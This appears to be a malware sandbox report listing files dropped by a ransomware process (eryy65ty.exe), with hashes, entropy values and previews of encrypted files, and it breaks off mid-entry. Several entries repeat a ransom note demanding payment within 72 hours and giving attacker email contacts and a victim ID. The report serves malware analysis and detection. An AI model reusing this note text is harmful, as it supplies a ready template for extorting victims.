                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):375
                                                                                                                                              Entropy (8bit):7.489331577249489
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q3oj2lEhTGC4PHN2fKFTcXsvuag9E21WyW2JJbiKcyEnl09SBafO+oZ4+s5RYb/1:tNGCCHNSKNccGx3tbJ5iyOpB+oZ4vrYZ
                                                                                                                                              MD5:9C4E38861989F74224C6A1A37CB56A45
                                                                                                                                              SHA1:52C2470EBF62131034A481492FEBEDF3611E4C6F
                                                                                                                                              SHA-256:7327F60E9186CE79020B6E36F03F24127D95D90FB8D4A571E5CB3C27F2F0C04A
                                                                                                                                              SHA-512:17793F6386C9B8749BE463214F53B35D0F332F1126DF555534E884668813EA40C1709118211E919BC12D4DD7F57EC83BCEB1F960731B99993D039F70F2507D4F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.J)2(.M.[.L....z.$r.I...&.0..Sm.m..t.`m.!2...~.,.V;]*..iS.J_z...x.<...&.(.`.FY..~..R.F...^.w.live.com/........qG.W..z.3.............i...@8....J.....x9..[\......G*Tk.P.nN...L..\..........y).G/.>...t.u.o.5....d.TP.{).. E..;).........49b.~s..._....a........Z.l.<X.<..{./P.!;.O..LK..U.l;.".%tK....Uh]...i*.#(..........[...".............?X..`.y.X..}E .FQ0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):375
                                                                                                                                              Entropy (8bit):7.489331577249489
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q3oj2lEhTGC4PHN2fKFTcXsvuag9E21WyW2JJbiKcyEnl09SBafO+oZ4+s5RYb/1:tNGCCHNSKNccGx3tbJ5iyOpB+oZ4vrYZ
                                                                                                                                              MD5:9C4E38861989F74224C6A1A37CB56A45
                                                                                                                                              SHA1:52C2470EBF62131034A481492FEBEDF3611E4C6F
                                                                                                                                              SHA-256:7327F60E9186CE79020B6E36F03F24127D95D90FB8D4A571E5CB3C27F2F0C04A
                                                                                                                                              SHA-512:17793F6386C9B8749BE463214F53B35D0F332F1126DF555534E884668813EA40C1709118211E919BC12D4DD7F57EC83BCEB1F960731B99993D039F70F2507D4F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.J)2(.M.[.L....z.$r.I...&.0..Sm.m..t.`m.!2...~.,.V;]*..iS.J_z...x.<...&.(.`.FY..~..R.F...^.w.live.com/........qG.W..z.3.............i...@8....J.....x9..[\......G*Tk.P.nN...L..\..........y).G/.>...t.u.o.5....d.TP.{).. E..;).........49b.~s..._....a........Z.l.<X.<..{./P.!;.O..LK..U.l;.".%tK....Uh]...i*.#(..........[...".............?X..`.y.X..}E .FQ0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):378
                                                                                                                                              Entropy (8bit):7.432104957266356
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Xi+Yt7jpaRRrZsvrGQDjV4fO2rIy8MyGXFQLtd2ZMxt5AlDMmobEDHIYv902S3kS:epaRRVsjGQCfwy8rL2uxt5a5MEDHjvKd
                                                                                                                                              MD5:E1C5E04142D0E9388018A23E327C473B
                                                                                                                                              SHA1:335768B730E5F86EC296A7DC7BF90419B9FFCD2D
                                                                                                                                              SHA-256:9E6653927C13460E980183E31114C3FB5A6F279ED469BD3DAED7CD899BA7B2C6
                                                                                                                                              SHA-512:E9307A8B3F55998FDCCAEFC3BF2BF61AE017F3A17867D9629E537CF47EA5AEAA3170DB9AAC62C1CCF03B2CF9A993E621365A6EF7F0161BFDF94BB24287190089
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:(&..wxA`1+....'...Qc...d\.&du-...u.H...p...}. .t.W....tL.Nky......hQ.g.....'O.f.,.j?.sy.fw.nytimes.com/...7..u?cS.+.1...}z.....ih...uf...+r.7....e.....7..6+x7&M..]...% G<.;..2..~..t.../..%.%`.)...U.]...#G.. ...M...9....]]....(..K...B..._.)..A..^..}l.E.E.S.A(..^.....~..M.....E.).."Z6.}2.$..hz".....MU..U.-'i....+....'.nopP.<...G...^L..|..!..$...0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):378
                                                                                                                                              Entropy (8bit):7.432104957266356
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Xi+Yt7jpaRRrZsvrGQDjV4fO2rIy8MyGXFQLtd2ZMxt5AlDMmobEDHIYv902S3kS:epaRRVsjGQCfwy8rL2uxt5a5MEDHjvKd
                                                                                                                                              MD5:E1C5E04142D0E9388018A23E327C473B
                                                                                                                                              SHA1:335768B730E5F86EC296A7DC7BF90419B9FFCD2D
                                                                                                                                              SHA-256:9E6653927C13460E980183E31114C3FB5A6F279ED469BD3DAED7CD899BA7B2C6
                                                                                                                                              SHA-512:E9307A8B3F55998FDCCAEFC3BF2BF61AE017F3A17867D9629E537CF47EA5AEAA3170DB9AAC62C1CCF03B2CF9A993E621365A6EF7F0161BFDF94BB24287190089
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:(&..wxA`1+....'...Qc...d\.&du-...u.H...p...}. .t.W....tL.Nky......hQ.g.....'O.f.,.j?.sy.fw.nytimes.com/...7..u?cS.+.1...}z.....ih...uf...+r.7....e.....7..6+x7&M..]...% G<.;..2..~..t.../..%.%`.)...U.]...#G.. ...M...9....]]....(..K...B..._.)..A..^..}l.E.E.S.A(..^.....~..M.....E.).."Z6.}2.$..hz".....MU..U.-'i....+....'.nopP.<...G...^L..|..!..$...0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):377
                                                                                                                                              Entropy (8bit):7.393190400327023
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:P/W4vCiFyWt3Ajeew8mYUX0wo897lHfuGPBSLa+UcVz3LK0aIQ2qJMkyKMeLwn:jvyaSjnWJG6BN+UcR3LK0aDnJMhKMbn
                                                                                                                                              MD5:B544F6A79C146E3C2A4EA69F90A9883F
                                                                                                                                              SHA1:EDC90E666DC17C212B108811819818ED03595A50
                                                                                                                                              SHA-256:DFBD5795A157AA9B4178F5AE48D13D04FD82AD0CB118C1160200C7075ECEAB0C
                                                                                                                                              SHA-512:34D2729627A0A82B1CEDEE7151312B58E033CFA1BC270DCFEA11A540104744AE59EA88EB2705E1042FA3572990F76E10C6F6DCA831D4CAA7A05B4122876D691A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.TcK.........*.B....M..........B-2....>Z."...1..QyGV.=....Gm.h...t.Y.U.Fy^.......X.Qtl.DH...w.reddit.com/..2$v..k(...|x.....K..b.#q.9h..oS..t|.}....y..<.*..dx....U..g.d}&.x......;r.b....5.Gi..|.Ev._...A#.....p..@.."......x.c..[..-..z.d.!.z1d.=..o.w..]' ..}...2.Yhu.wa8.&....H...h.Mo..x....x...]S.RP&?E~.....9>..........vMW....jZ.......B..~.L @..[(.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):377
                                                                                                                                              Entropy (8bit):7.393190400327023
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:P/W4vCiFyWt3Ajeew8mYUX0wo897lHfuGPBSLa+UcVz3LK0aIQ2qJMkyKMeLwn:jvyaSjnWJG6BN+UcR3LK0aDnJMhKMbn
                                                                                                                                              MD5:B544F6A79C146E3C2A4EA69F90A9883F
                                                                                                                                              SHA1:EDC90E666DC17C212B108811819818ED03595A50
                                                                                                                                              SHA-256:DFBD5795A157AA9B4178F5AE48D13D04FD82AD0CB118C1160200C7075ECEAB0C
                                                                                                                                              SHA-512:34D2729627A0A82B1CEDEE7151312B58E033CFA1BC270DCFEA11A540104744AE59EA88EB2705E1042FA3572990F76E10C6F6DCA831D4CAA7A05B4122876D691A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.TcK.........*.B....M..........B-2....>Z."...1..QyGV.=....Gm.h...t.Y.U.Fy^.......X.Qtl.DH...w.reddit.com/..2$v..k(...|x.....K..b.#q.9h..oS..t|.}....y..<.*..dx....U..g.d}&.x......;r.b....5.Gi..|.Ev._...A#.....p..@.."......x.c..[..-..z.d.!.z1d.=..o.w..]' ..}...2.Yhu.wa8.&....H...h.Mo..x....x...]S.RP&?E~.....9>..........vMW....jZ.......B..~.L @..[(.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):378
                                                                                                                                              Entropy (8bit):7.524859967818262
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:UjMNAICYR+xDgqw04M4Qc50Vaq3sNNLDYOSFzZzfHlAJhVFMJyJMJSDVrSn:UjMaYjy45r50LcNNEOSfOvVHDVmn
                                                                                                                                              MD5:20E76B6B3E330EE1EF5527BBD7CD49DC
                                                                                                                                              SHA1:96CDB632D0454923DB21F8CE9EDB331FFCCFCB5B
                                                                                                                                              SHA-256:034D0725FBD121B0297172CC41A036D2B6644B0DDBECFAEAEE095A580400836E
                                                                                                                                              SHA-512:47D4AEFB316CC42BE609AA5A18940C06F65C181271D7BF89FAA7E5176A827F7B34651B4B4263758164584DA645F2F0493ED04BF22BD7B11A882F0EEFE9D5BA3B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..a..-Zr:Y....U.;......o.Y..y`g...G.M.}..G.NrId9>\_o.R..y..YE{....u.8S..c(,..........J(....rw.twitter.com/..[.!x..J.<..&.8.*..,......3f..u.GEn....2/.l..2....[...N9..6.#.%@@..W:.......N..x.+}V.L....ZV.....v....L..."?...L."..k...|.k.....}......a...k..7....D.*...hW.2=TH..J C%.p.:}.E$C.qg.1.B......|."..3..hOt.....Oq......Ux.Q?...zd.1.{v=.0K..0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):378
                                                                                                                                              Entropy (8bit):7.524859967818262
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:UjMNAICYR+xDgqw04M4Qc50Vaq3sNNLDYOSFzZzfHlAJhVFMJyJMJSDVrSn:UjMaYjy45r50LcNNEOSfOvVHDVmn
                                                                                                                                              MD5:20E76B6B3E330EE1EF5527BBD7CD49DC
                                                                                                                                              SHA1:96CDB632D0454923DB21F8CE9EDB331FFCCFCB5B
                                                                                                                                              SHA-256:034D0725FBD121B0297172CC41A036D2B6644B0DDBECFAEAEE095A580400836E
                                                                                                                                              SHA-512:47D4AEFB316CC42BE609AA5A18940C06F65C181271D7BF89FAA7E5176A827F7B34651B4B4263758164584DA645F2F0493ED04BF22BD7B11A882F0EEFE9D5BA3B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..a..-Zr:Y....U.;......o.Y..y`g...G.M.}..G.NrId9>\_o.R..y..YE{....u.8S..c(,..........J(....rw.twitter.com/..[.!x..J.<..&.8.*..,......3f..u.GEn....2/.l..2....[...N9..6.#.%@@..W:.......N..x.+}V.L....ZV.....v....L..."?...L."..k...|.k.....}......a...k..7....D.*...hW.2=TH..J C%.p.:}.E$C.qg.1.B......|."..3..hOt.....Oq......Ux.Q?...zd.1.{v=.0K..0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):380
                                                                                                                                              Entropy (8bit):7.350776703070346
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:EF+GTqiOylf5FZWRdv3BG4+L6qvJ6WNZ9K7y3mV0hEWlKwQ6pT5YdfPIzecOa5Al:EF+GGiOy3jW/BGL3BT9K22ihZKwfpSP/
                                                                                                                                              MD5:C52B85AA0E7AEB4AE548D38D081A1697
                                                                                                                                              SHA1:98ABB4D2E2BC379FA51C07FB12BF5D7E3B87958A
                                                                                                                                              SHA-256:EB3DBBC5D041F6F0049652D52E34FDE8E67FB0DDDDEE3578BE556C068B89BD68
                                                                                                                                              SHA-512:CF58ABC057F1470744715E20396482A320B44D25D604DC353972477FADF4DD8FAFCBB2986FA992C0BBA65444411BECB899107A61E66830679259C308DC7DE049
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:B... ....7.TI.r...?.x...Ow......)CO..K.\j...1[8.f.~)X..(.d..E...,W.<.7.4..J....3\JrU..&........s..b..=dc...TI^...D...........i....j.j..P......%zP...v|jD.]t<.....M...?O.I.;.#......o.l|#....=@WR~%.Tp.V.H.;B^@.[./.%..=pL75..z......ub.gA._.)).:...~1.9.F.:HFza.\..]..:D.R...n\......^1..:,_..z..P2..%.1.H....f..t%..\.n......n.7^JF..LH.T...b....e.b.#d...t....0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):380
                                                                                                                                              Entropy (8bit):7.350776703070346
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:EF+GTqiOylf5FZWRdv3BG4+L6qvJ6WNZ9K7y3mV0hEWlKwQ6pT5YdfPIzecOa5Al:EF+GGiOy3jW/BGL3BT9K22ihZKwfpSP/
                                                                                                                                              MD5:C52B85AA0E7AEB4AE548D38D081A1697
                                                                                                                                              SHA1:98ABB4D2E2BC379FA51C07FB12BF5D7E3B87958A
                                                                                                                                              SHA-256:EB3DBBC5D041F6F0049652D52E34FDE8E67FB0DDDDEE3578BE556C068B89BD68
                                                                                                                                              SHA-512:CF58ABC057F1470744715E20396482A320B44D25D604DC353972477FADF4DD8FAFCBB2986FA992C0BBA65444411BECB899107A61E66830679259C308DC7DE049
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:B... ....7.TI.r...?.x...Ow......)CO..K.\j...1[8.f.~)X..(.d..E...,W.<.7.4..J....3\JrU..&........s..b..=dc...TI^...D...........i....j.j..P......%zP...v|jD.]t<.....M...?O.I.;.#......o.l|#....=@WR~%.Tp.V.H.;B^@.[./.%..=pL75..z......ub.gA._.)).:...~1.9.F.:HFza.\..]..:D.R...n\......^1..:,_..z..P2..%.1.H....f..t%..\.n......n.7^JF..LH.T...b....e.b.#d...t....0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):378
                                                                                                                                              Entropy (8bit):7.38772980124784
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:0QUjtucGCG1idA4FLlnG/v/PgO/1CSCNP81NKckkFgE97H/HaQW2ZpSwHfwn:0QUjcnCGkdRNG/ITS2PosiFgQfHaU8wo
                                                                                                                                              MD5:1BD0098CAA84B5CD2244F755F6D53D12
                                                                                                                                              SHA1:7475D01A825EC37BF88B9DD56FC4A7EC415AA946
                                                                                                                                              SHA-256:2C5A57FA957E34394DC30E27F7CEF6F2F07CE6838C2551BF30542C355722805D
                                                                                                                                              SHA-512:784F430894EF277C1B1BCE454F8FF21301F986F7950E164A5DCD1BD8F439CC5FCEC8FFD1D53996941EF4BDBC6C86E26CBA125E5D5E983FC9F8A04A1C3F2C5BB0
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:n.##&n.E.KQ....A....D.-..O....n.\...?.pt_.6QA.......<.2 i.6...."%...{P......8.Z.]..x.=;."....Qw.youtube.com/...j...........-..%.....%..2....?.L.0.].3.uy{...A.....;|..............m<.>$....-...F.W..p.9p.%.D.t......{,. .rX.....>FBG|....C.x.B25$o..E5:..woC.C.B.....rt.m.M.1._G.Y...J.........]<.r/..so.....{.Mr....#..:....8#.w.s..].V...h,.A.X&..w.U...l.....&0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):378
                                                                                                                                              Entropy (8bit):7.38772980124784
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:0QUjtucGCG1idA4FLlnG/v/PgO/1CSCNP81NKckkFgE97H/HaQW2ZpSwHfwn:0QUjcnCGkdRNG/ITS2PosiFgQfHaU8wo
                                                                                                                                              MD5:1BD0098CAA84B5CD2244F755F6D53D12
                                                                                                                                              SHA1:7475D01A825EC37BF88B9DD56FC4A7EC415AA946
                                                                                                                                              SHA-256:2C5A57FA957E34394DC30E27F7CEF6F2F07CE6838C2551BF30542C355722805D
                                                                                                                                              SHA-512:784F430894EF277C1B1BCE454F8FF21301F986F7950E164A5DCD1BD8F439CC5FCEC8FFD1D53996941EF4BDBC6C86E26CBA125E5D5E983FC9F8A04A1C3F2C5BB0
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:n.##&n.E.KQ....A....D.-..O....n.\...?.pt_.6QA.......<.2 i.6...."%...{P......8.Z.]..x.=;."....Qw.youtube.com/...j...........-..%.....%..2....?.L.0.].3.uy{...A.....;|..............m<.>$....-...F.W..p.9p.%.D.t......{,. .rX.....>FBG|....C.x.B25$o..E5:..woC.C.B.....rt.m.M.1._G.Y...J.........]<.r/..so.....{.Mr....#..:....8#.w.s..].V...h,.A.X&..w.U...l.....&0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):266
                                                                                                                                              Entropy (8bit):7.129278559590891
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:XR7qdGpJD4AmViw8u4/QjpIUU9k6zI9iYG1wFWqZpip2n:BsOJkAmsJuyAU9k689iP6b+2n
                                                                                                                                              MD5:B8A8110228C7CA79D7B421E3A4B6E663
                                                                                                                                              SHA1:D355DB26DF425B6364576DDF8A43F6B4E12DD0EA
                                                                                                                                              SHA-256:E3DD6AD343A51DC4AFF2E720F550D55239A93632BCADA833EE6205243619AB45
                                                                                                                                              SHA-512:91C2989B4F0726CC87EDD0A63106FE69C8A40B691E225B00F125FC7677E904C1BDBC5B03CB58362F3E5EFCC01FFCEFFF03CA9178164DE68DABDFB3F789292FAE
                                                                                                                                              Malicious:false
                                                                                                                                              Preview::...c.c./1.m...o.).....u$.>+..#..PQ./FL*0...%.#...42...{.H.[.czV...8..HfK$.J.D.2..]..h....H.b....U....Nr.%.HXY.}.{'../'...3.yh...%...w...S....T...1tb.A@..l.......Rt[.!...vb...i[n..6.u0."..e.7.).x.v8Q...CO....!.9......~.K........$M...H..|Y.&..c.....0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):266
                                                                                                                                              Entropy (8bit):7.162942538697599
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:f7mgXN+RIqmAf4oAD8gQvmBwlPq2Zjw/62dEV9JpfIpimHn:TmeKmw5AD8X1j+6igJZIown
                                                                                                                                              MD5:090B66C3290FC27AFBD12700103346F2
                                                                                                                                              SHA1:FD8FEA392B9F591B981F590C959E714DEB6E34DF
                                                                                                                                              SHA-256:4F65FE7EB8E86C1A4C968D03D99FA8FAA31B9ADA6C72CB6E69FC8A3D5EAAADEF
                                                                                                                                              SHA-512:5C539303185B1A5E606FEF9DE728C7B0B151C1F80C5A8A5AC96D36F8438DB40139646836C72D1DD3782FE679F836AB06C870FB3AA5E85B7F64B2CF96D24D3C4A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:1.F....K@.......2..B9.)Vt...L\+...d../B...h..u.d....m.W...g.9...=....L<d...[M@%1.;...v5l2{h...`#!An..)j....A...... l.s.3O....9..Uz..Q/vQ..0pbK..o...b..t._..fy;...m..KU.....pD...........&<!j..!..x. ..G....i.1..S.>....=}..mv.f..2i....@}...C0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):266
                                                                                                                                              Entropy (8bit):7.18365597856349
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:8FGt4Flx8S5MqIfYL96VAqLBU8NSl4kP1rUjtn:YGt4Flxr5M9fYLYV9e8ol48Otn
                                                                                                                                              MD5:9B91D195241E223E686A21696445DAB8
                                                                                                                                              SHA1:3CB3D168172430F20F4ECF5B7717857A0A94138F
                                                                                                                                              SHA-256:214203467D8D7FB31DD40029B4D3FBE6FEEBCCCBC5E489BCC9EBD5463F98266F
                                                                                                                                              SHA-512:641FEC2C9645F509B1AC262FF702281B7E370D15B0B27E1CB968E748E3B23BA34C841FD1B862401230F5E5647B627565B3CD00E300776F723F41F6B7AA4BE0B3
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:aF...O.J..x...z%....PV...B.._4.clJ...R-..lb...5".....) .Q5...k....s.@.3.a...]..*.J<..|g..{.a2b.Vp....wf...&.....,5.X.n.e|.P=\.F..D.z...u~._Z?...6...R...".t!.S.E.D.....F.t..B.p.CgD......_...4..#.P.<.~... ) ...y....v&.....X..zMd..O...@z..X.*`g.@..0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
